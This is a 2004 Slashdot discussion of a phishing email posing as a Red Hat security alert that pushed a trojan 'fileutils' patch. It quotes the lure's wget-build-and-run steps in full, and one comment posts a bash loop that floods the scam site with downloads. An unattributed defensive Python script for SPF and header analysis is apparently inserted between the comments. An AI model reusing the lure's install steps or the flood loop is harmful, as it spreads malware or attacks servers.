Beware 'Fedora-Redhat' Fake Security Alert

rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.
  • by Orgazmus ( 761208 ) on Sunday October 24, 2004 @08:55PM (#10617044)
    Adopting dumb users had to bring the ones exploiting the stupidity with them. Even though running as a non-admin should help against these things, there is no cure against security holes between the chair and the keyboard.
  • About Time (Score:4, Insightful)

    by Mr. Arbusto ( 300950 ) <[moc.liamg] [ta] [kcuhcemirpeht]> on Sunday October 24, 2004 @08:55PM (#10617045) Journal
    It's phishing; it happens on every platform and requires the user to do something they think is in their best interest. Nothing new.
  • wont work (Score:3, Insightful)

    by Anonymous Coward on Sunday October 24, 2004 @08:57PM (#10617052)
    Don't most Fedora people use yum to keep their systems up to date? I don't think many Fedora/Red Hat admins would fall for this.
  • Real link? (Score:5, Insightful)

    by chrispyman ( 710460 ) on Sunday October 24, 2004 @08:58PM (#10617061)
    Why not just use the real link and slashdot their site into oblivion!
  • by LostCluster ( 625375 ) * on Sunday October 24, 2004 @08:58PM (#10617063)
    Red Hat's reply to this issue is pretty straightforward. They've already taken all of the steps to properly sign their real updates, and this should stand out as a fake because it lacks all of those digital signatures.

    However, what good is that against Joe User who falls for the bait and thinks the e-mail is authentic because they believe everything they read on their screen? They don't know to check for the "security seals", and so they don't see any red flags indicating that this is bogus.

    It's something in info security that disconnects when dealing with average users. They don't know what to look for, and therefore the absence of those marks is not as alarming to them as it is for us... a little something that needs to be cleaned up before Linux is ready for desktop primetime.
  • Confidence (Score:3, Insightful)

    by FiReaNGeL ( 312636 ) <fireang3l.hotmail@com> on Sunday October 24, 2004 @09:04PM (#10617111) Homepage
    OK, we all know no Linux guru will ever fall for this kind of stupid trick.

    But imagine a world where Linux overwhelms Microsoft as the #1 desktop OS. Millions of Moms and Pops everywhere, using Linux. Who will they trust for their "updates"? I know for sure lots of them would fall for this particular trick, and it's one of the first times we see this. Lots of distros, lots of sources, lots of patches, major confusion.

    Question (as I don't use Linux yet): Do some of the major distros (Red Hat, etc.) have a web service for updates, akin to windowsupdate.com? I sure hope so; it's essential for further desktop market share increase.
  • Re:Source code! (Score:1, Insightful)

    by Anonymous Coward on Sunday October 24, 2004 @09:08PM (#10617136)
    Inst.c is just a compiled shell script. The actual code is in fileutils-patch.bin.
  • Re: text (Score:5, Insightful)

    by Inf0phreak ( 627499 ) on Sunday October 24, 2004 @09:09PM (#10617145)
    Why post the text instead of having the /. crowd flood their server to see what they've put up there? Potentially that could bring the server offline and cost them a bundle for a great two-sided effect (OK, the latter is not that cool if it's just some rooted box, but at least it would prevent anyone being affected if it was /.'ed to hell).
  • does it or not ? (Score:2, Insightful)

    by Matt_Joyce ( 816842 ) on Sunday October 24, 2004 @09:11PM (#10617153) Journal

    It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code."


    Either it is malicious or not.
    Don't they know?

    If it does, explain what it does and how to mitigate the damage.
    If it does not, let people know so emotional energy can be used elsewhere.

    What's the definition of 'malicious code' anyway?
    Presumably any code you don't want running is malicious.
    Creating a temp file would be a malicious use of disk space, etc.

  • by Nailer ( 69468 ) on Sunday October 24, 2004 @09:19PM (#10617207)
    The domain name was a good start, but these kids will have a hard time fooling anyone since they've ignored most of the basics:

    • Most users who install security upgrades won't be running Red Hat 7.x.
    • Red Hat is two words. Both begin with capitals.
    • Red Hat use packages. Not hard guys.
    • Security updates are provided through up2date. If they were smart, they would have provided an up2date source to use.
    • The exclamation marks in 'Apply this patch!' seem a little un-vendor-like.
  • by ironfrost ( 674081 ) on Sunday October 24, 2004 @09:29PM (#10617271) Homepage Journal
    There IS a Raymond Jackson that lives at that address (except that it's in CA rather than NY, as has been previously noted), so it's not completely made up. Although, whether he's really the perpetrator or simply someone the real criminal doesn't get on with is still a matter of doubt. In any case, all his details (including e-mail address and phone number) can be easily found from a Google search - he runs a chapter of the Historical Miniatures Gaming Society [hmgs.org] in his area (HMGS West, near the bottom of the page).
  • And so... (Score:2, Insightful)

    by Eric Damron ( 553630 ) on Sunday October 24, 2004 @09:43PM (#10617355)
    The question begging to be asked is why is this site still alive?

    heh, maybe it won't be for long with the /. effect!
  • by turnstyle ( 588788 ) on Sunday October 24, 2004 @09:45PM (#10617360) Homepage
    Why post the text instead of having the /. crowd flood their server to see what they've put up there?

    Because sending loads of traffic to a site that is actively trying to get a trojan onto unsuspecting boxes seems like a pretty bad idea.

    Apart from those that might click through without bothering to RTFA, and mistakenly think that it's a legit patch, there are also all those browser exploits (such as the Microsoft jpeg exploit) that could also be waiting on the site for unpatched systems.

  • by bigberk ( 547360 ) <bigberk@users.pc9.org> on Sunday October 24, 2004 @09:51PM (#10617406)
    This is misleading. SPF might help verify that this email didn't come from redhat.com, but SPF isn't going to help you in general:
    • The envelope sender could have not been @redhat.com but the From field could have contained redhat.com; then, there is no SPF to check and you can't benefit from redhat's SPF record
    • The sender could have used a fedora-redhat.com address and published an SPF record for their own domain. Spammers already do this. The SPF check tells you nothing about authenticity. The SPF check would succeed, and it could still be a forgery.
  • by aldoman ( 670791 ) on Sunday October 24, 2004 @09:55PM (#10617424) Homepage
    RE: RedHat 7.3, frankly that's BS. 7.3 and 9 are very heavily used, still.
  • by OmegaBlac ( 752432 ) on Sunday October 24, 2004 @10:03PM (#10617466)
    It's something in info security that disconnects when dealing with average users. They don't know what to look for, and therefore the absence of those marks is not alarming to them as it is for us... a little something that needs to be cleaned up before Linux is ready for desktop primetime.

    Yet that hasn't stopped Windows from being ready for "desktop primetime", huh? There will always be dim-witted Joe Users that will get burnt by these lame social engineering scams regardless of the OS. These very well could be the same people who are being taken advantage of offline as well. Linux is already on the desktop. It has been ready for primetime for a while. Of course there is nothing it can do to protect the user from the biggest security threat of them all: the user themselves.
  • by synthparadox ( 770735 ) on Sunday October 24, 2004 @10:08PM (#10617502) Homepage
    #!/usr/bin/env bash
    # Fetch the fake "patch" tarball over and over and throw it away, to
    # load the site down. (The URL was split by a stray space in the original.)

    while true
    do
        wget -q http://www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
        rm -f fileutils-1.0.6.patch.tar.gz
    done
    Already running and will be running throughout the night.
  • Re:bastards (Score:5, Insightful)

    by vsync64 ( 155958 ) <vsync@quadium.net> on Sunday October 24, 2004 @10:23PM (#10617593) Homepage
    Red Hat should simply rename the file on their site, change the links to it, and then replace it with a "THIS IS FRAUD" PNG.
  • by Feanturi ( 99866 ) on Sunday October 24, 2004 @10:44PM (#10617697)
    without bothering to RTFA, and mistakenly think that it's a legit patch,

    Though it's a shitty thing for someone to be doing, as it is anytime somebody tries to get a virus or exploit going, it is at the same time a very amusing example of one. Think about it, the concept of this one has a certain beauty: It is meant to be activated while the machine is under the control of someone who should know better. There is no clueless-luser-carelessly-clicking that can be done here, you've got to know some basic geek stuff to go get the 'patch', unpack it, install it.. You've got to expend a reasonable amount of effort to get nailed by this thing. That is both its curse and its beauty.
  • by DissidentHere ( 750394 ) on Sunday October 24, 2004 @10:47PM (#10617716) Homepage Journal
    Why would anyone even bother trying this kind of cheap social engineering with Linux users at this point? What /. reader would actually fall for this shit? We all make fun of security through obscurity, but *nix users also tend to have security through intelligence.

    Here is where the real danger lies, getting Linux on the desktop and having your grandma fall for this type of tripe, it will give *nix a bad name. "Oh no, Linux is just as vulnerable as Windows" No - its the users that are vulnerable, and the users that need to be educated. We all do what we can to lock down our boxen, but in the end it too often comes down to what's between the chair and the keyboard.
  • Re:I love it! (Score:3, Insightful)

    by juhaz ( 110830 ) on Sunday October 24, 2004 @10:50PM (#10617733) Homepage
    Do you know if there's a cure for this?

    A cure for what? Human curiosity? Why on Earth would anyone want to be "cured" of that, and become something less instead? It's one of the few good qualities that have brought us so far despite our lacking in other important areas...

    On computer geeks, need to know how things work naturally becomes directed towards computers...
  • by Anonymous Coward on Sunday October 24, 2004 @10:53PM (#10617746)
    This is so cool !

    Given that most users of Mozilla/Thunderbird are end users, and a large percentage would not run their own MTA, this would be a wonderful permanent feature in Mozilla.

    It would be even better if you could use it as a rule to manage messages - i.e. immediately trash spoofed messages without presenting them to the end user.

    Given the (lack of) speed with which ISP's are implementing SPF doing it at the MUA end is a great stopgap.

    Please submit it - it's a damn fine idea.
  • by MbM ( 7065 ) on Sunday October 24, 2004 @11:12PM (#10617846) Homepage
    The klik source is not a trojan, it's simply a glorified wget wrapper .. no idea why

    It seems stupid to encode the shell script into an unreadable form and then to post the sources; a few small changes to the source and it happily prints out the shell script.
  • by Anonymous Coward on Sunday October 24, 2004 @11:40PM (#10617967)
    The original email that was making the rounds:

    Dear RedHat user,

    Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

    The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

    * First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
    * Untar the patch:tar zxvf fileutils-1.0.6.patch.tar.gz
    * cd fileutils-1.0.6.patch
    * make
    * ./inst

    Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.

    Thank you for your prompt attention to this serious matter,

    RedHat Security Team.

    Copyright © 2004 Red Hat, Inc. All rights reserved.

    The interesting thing is the link that is listed to download the trojan. It's the Stanford website. The person who owns /~joeio is Irene O Joe from the Law School. Was the Stanford website compromised?
  • Re:I love it! (Score:4, Insightful)

    by Tony-A ( 29931 ) on Sunday October 24, 2004 @11:58PM (#10618036)
    Do you know if there's a cure for this?

    You don't want a cure for this.

    If you want a legitimate comparison between Linux and Windows security, observe:

    This is new and fresh enough to "set up a sandbox environment and run it, to see what happens!" Another Windows similar thingee, "been there done that".

    Dated 23rd October 2004 on http://www.redhat.com/security/, which means that Red Hat was on top of it fast. This isn't the kind of thing that Slashdot sits on, and Red Hat was one day plus ahead. For comparison, it took about 6 days for Microsoft to return anything about Code Red on a search from microsoft.com. That's 6 days after appearing on Slashdot (compared to 1 day before).

  • by suckmysav ( 763172 ) <suckmysav AT gmail DOT com> on Monday October 25, 2004 @12:02AM (#10618051) Journal
    > In conclusion. I want to say that I believe
    > if all people had:
    >
    > 1) Startup Monitor - Painfully simple, no one
    > should be without it.

    I use startup monitor. It is good. The problem is that the vast majority of Windows users are so habitualised into clicking 'YES' all the time that nasties will often get installed anyway.

    Malware: Do you want to install this nasty browser hijacker?

    n00b: Yes, just give me my goddamn "tropical aquarium" screensaver already!

    > 2) Kerio Personal Firewall, or equivalent

    Agreed, although even better is to have a NAT/firewall device for your internet connection. I'm not a fan of having a local "personal" firewall on a n00b's PC, as n00bs have a habit of screwing things up, and this includes screwing up their firewall software. If your firewall functionality is sitting in a little NAT box in the corner then they are not gonna accidentally screw it up. Also, personal firewalls such as ZoneAlarm can also suffer from the "yes click reflex" problem.

    Malware: Tries to 'phone home'

    ZoneAlarm: Do you want to let application porn2u.exe have access to the internet?

    n00b: Yes goddammit, and stop bugging me already!

    > 3) An executable monitor as described above.

    I'm not sure I understand what you are suggesting here. I assume you are referring to a process listing app, such as the Windows task manager? Most clueless n00bs are not capable of comprehending what task manager is showing them. There are too many "good" processes that are virtually unidentifiable listed.

  • by Spoing ( 152917 ) on Monday October 25, 2004 @12:06AM (#10618070) Homepage
    Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.

    Not if you run your own mail server(s).

    As a test of why this is a BAD IDEA, send a message from your servers to an outside account. Read the full headers. Notice helpful little things there including IP addresses?

    (Yes, you can send the message through your own servers to another account...though it might make reading the headers even more confusing if you've never done it before.)
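
The two points made in bigberk's and Spoing's posts above (an SPF "pass" on the envelope sender says nothing about the domain shown in From:, and the full Received: headers carry the IP addresses that tell you where a message really entered the mail system) can be checked mechanically. The script below is an added example written for this thread; it is not code from Slashdot, Red Hat or either commenter. The raw message, the host names, the IP addresses and both SPF records in it are constructed for illustration (the redhat.com record in particular is an assumption, not Red Hat's real policy), and the SPF evaluator only understands ip4: terms and a trailing all, which is enough to show the failure mode described.

```python
"""Header analysis for a suspected forged vendor-security mail.

Does the SPF result actually vouch for the visible From: domain, and what
do the Received: headers say about where the message came from?
"""
import ipaddress
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: visible From: claims redhat.com, but the envelope
# sender (Return-Path) is the forger's own domain.  Received: headers read
# top-down from the recipient's MTA back toward the origin.
RAW_MAIL = """\
Return-Path: <security@fedora-redhat.com>
Received: from relay.example.tw (relay.example.tw [198.51.100.7])
    by mail.example.net with ESMTP id 1; Sun, 24 Oct 2004 11:59:00 +0000
Received: from localhost (unknown [203.0.113.42])
    by relay.example.tw with SMTP id 2; Sun, 24 Oct 2004 11:58:00 +0000
From: "RedHat Security Team" <security@redhat.com>
To: user@example.net
Subject: Critical fileutils update

Dear RedHat user, please download and run the attached patch.
"""

# Constructed stand-in for DNS TXT lookups.  Anyone who owns a domain can
# publish a record listing their own relay, so a "pass" for the lookalike
# domain is exactly what a forger would arrange.
SPF_RECORDS = {
    "redhat.com": "v=spf1 ip4:192.0.2.0/24 -all",            # assumed record
    "fedora-redhat.com": "v=spf1 ip4:198.51.100.0/24 -all",  # forger-published
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
IP_IN_FROM = re.compile(r"\bfrom\s.*?\[(\d{1,3}(?:\.\d{1,3}){3})\]", re.DOTALL)


def domain_of(header_value):
    """Domain part of the first address in a From:/Return-Path: value."""
    return parseaddr(header_value or "")[1].rpartition("@")[2].lower()


def spf_check(domain, ip, records=SPF_RECORDS):
    """Minimal SPF evaluator: ip4:CIDR terms and an 'all' catch-all only.
    Returns 'none' when the domain publishes no record at all."""
    record = records.get(domain)
    if not record or not record.startswith("v=spf1"):
        return "none"
    addr = ipaddress.ip_address(ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        if term.startswith("ip4:") and addr in ipaddress.ip_network(term[4:], strict=False):
            return QUALIFIERS[qualifier]
        if term == "all":
            return QUALIFIERS[qualifier]
    return "neutral"


def aligned(envelope_domain, from_domain):
    """Relaxed alignment: the SPF-checked domain must be the From: domain or
    a subdomain of it (a simplification of DMARC's organizational-domain rule).
    A lookalike such as fedora-redhat.com does not align with redhat.com."""
    return envelope_domain == from_domain or envelope_domain.endswith("." + from_domain)


def received_chain(msg):
    """Connecting IP from each Received: header, nearest hop first.  Only the
    top entry was written by a server you trust; the rest can be forged."""
    ips = []
    for value in msg.get_all("Received", []):
        m = IP_IN_FROM.search(value)
        if m:
            ips.append(m.group(1))
    return ips


def analyze(raw, records=SPF_RECORDS):
    msg = message_from_string(raw)
    from_domain = domain_of(msg["From"])
    envelope_domain = domain_of(msg["Return-Path"])
    chain = received_chain(msg)
    # SPF is evaluated for the envelope sender against the IP that connected
    # to *our* MTA, i.e. the one recorded in the topmost Received: header.
    spf = spf_check(envelope_domain, chain[0], records) if chain else "none"
    is_aligned = aligned(envelope_domain, from_domain)
    return {
        "from_domain": from_domain,
        "envelope_domain": envelope_domain,
        "spf": spf,                 # verdict for the envelope domain only
        "aligned": is_aligned,
        "received_chain": chain,
        "origin_ip": chain[-1] if chain else None,
        # SPF says something about From: only when it passes AND aligns.
        "from_vouched_for": spf == "pass" and is_aligned,
    }


if __name__ == "__main__":
    for key, value in analyze(RAW_MAIL).items():
        print(f"{key:16} {value}")
```

Run against the constructed message, the envelope domain fedora-redhat.com gets an SPF "pass" (the forger listed their relay), redhat.com's own record would have rejected the relay outright, and the two domains do not align, so the From: line is vouched for by nobody. The Received: chain puts the first hop at 198.51.100.7 and the apparent origin at 203.0.113.42; treat only the topmost entry as reliable, since every header below it was supplied by the sending side. In real use, replace SPF_RECORDS with a TXT lookup and take the connecting IP from your own MTA's log rather than from a header you did not write.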

  • by suckmysav ( 763172 ) <suckmysav AT gmail DOT com> on Monday October 25, 2004 @01:35AM (#10618426) Journal
    Ah ha, got it

    The trouble again would be that most clueless users won't understand what the window asking;

    Do you want to allow application
    "W1NPR0C32.EXE" to execute?

    [YES] [NO]

    means, which leads to the same "yes click reflex" problem I described above.

    It is a problem, because no matter what you do, there is always going to be a group of numbnuts out there who will click yes on anything that pops up. Often, they won't even read what it says. Any solution that produces even greater numbers of YES/NO dialogues will only serve to make the problem worse I'm afraid.

    The solution as I see it is to deny (for a particular class of) users the ability for them to install anything in the first place.

    This can be achieved in theory by running Windows under a restricted user policy, but in practice it doesn't work because too many programmers are too lazy to write their programs to run with anything other than "administrator" privileges, so we are stuck with a dilemma that will be hard to overcome.
  • Re:text of site (Score:1, Insightful)

    by Anonymous Coward on Monday October 25, 2004 @02:17AM (#10618544)
    >Brandybuck (704397) wrote: ...
    >doesn't belong to RedHat? This is social engineering at its finest.

    At its finest? Who the hell are you kidding? This is a sample of social engineering, yes... but... my god, it's far from being the cream of the crop. Way, way, way too many simple mistakes.

    Shows lack of attention to detail. Bad grammar, Taiwan mail relay, no up2date source... screams amateur...

    Now if the grammar had been correct, if the target had been correct (RH 9, FC 2), if the delivery method had been correct (up2date source), if the mail header had been properly faked... then it would rank as a decent attempt. But really... with the ease with which email headers can be faked... this doesn't even register on the talent meter of social engineering.

  • by Nailer ( 69468 ) on Monday October 25, 2004 @02:27AM (#10618571)
    It's common practice to "roll your own" where it's really important.

    It's a common bad habit usually done to satisfy the ego of the admin. Most Red Hat customers use the distro because of the support arrangements available. That support, which doesn't exist for third party packages (including 'roll their own') is more valuable than the ego boost the admin gets from doing things themselves.

    If you go replacing your packages with third party ones, you also miss out on a lot of the effort that Red Hat put into backporting security fixes. Does that Apache security fix change the format of module files? Not if you're running Red Hat's Apache package, it doesn't. If you're running something else, either backport it yourself (most people who have the skills to do that decide to let Red Hat do it for them) or update every module you're using.
  • Re:text of site (Score:1, Insightful)

    by Brandybuck ( 704397 ) on Monday October 25, 2004 @02:43AM (#10618609) Homepage Journal
    this doesn't even register on the talent meter of social engineering.

    Oh, but it does! Stop being an ass and look around you. Not everyone is an expert Red Hat administrator. Not everyone is paranoid enough to check the headers of every email they receive. Some people are <gasp> newbies! To them the "redhat-fedora" domain looks damned official.
  • Re:text of site (Score:3, Insightful)

    by Seehund ( 86897 ) on Monday October 25, 2004 @03:02AM (#10618660) Homepage Journal
    Really now? This should set off alarms in people's minds?

    Yes. At least in combination with the other glaring flaws I and others have already mentioned.

    People who subscribe to security update announcements (and thus would be the primary target for a fake security announcement) have actively chosen to do so, and know what they look like, where they're sent from, which domains are usually referenced and what that/those website(s) look like. People who have not subscribed to such announcements would likely be more suspicious of unsolicited messages of this kind.

    There are always exceptions. Some people will be taken in by this, no doubt, despite them being sufficiently savvy to have chosen to install a community-supported Linux distribution in the first place.

    It's social engineering all right. Just not at its finest.
  • WTF?? (Score:3, Insightful)

    by temojen ( 678985 ) on Monday October 25, 2004 @03:11AM (#10618682) Journal
    Redhat found a vulnerability in
    fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges.

    We're supposed to believe this?

  • by Tony-A ( 29931 ) on Monday October 25, 2004 @02:55PM (#10623215)
    ...the system works!

    Agreed, but one needs to be very, very careful about any assumptions as to exactly which system it was that worked.

    The first order of business is to somehow, anyhow, stem the tide.
    The second is to be very wary of jumping to any conclusions. If I'm going to do something bad that requires a name and address on it, I will use your name and address, not mine.
    Third, it is probably better if the reactive responses are not exactly predictable. If your enemy has extremely predictable responses, you can defeat his superior forces with inferior forces.

    Judging from this and the responses to this, I'd say that Open Source is in very good shape to take care of itself. Even better than a coordinated defense is being able to defend regardless of coordination or the lack thereof. Counting vulnerabilities is an extremely bad metric, particularly considering that Red Hat, etc knows that if you actually want people to patch their systems, you never under any circumstances downplay the potential severity.
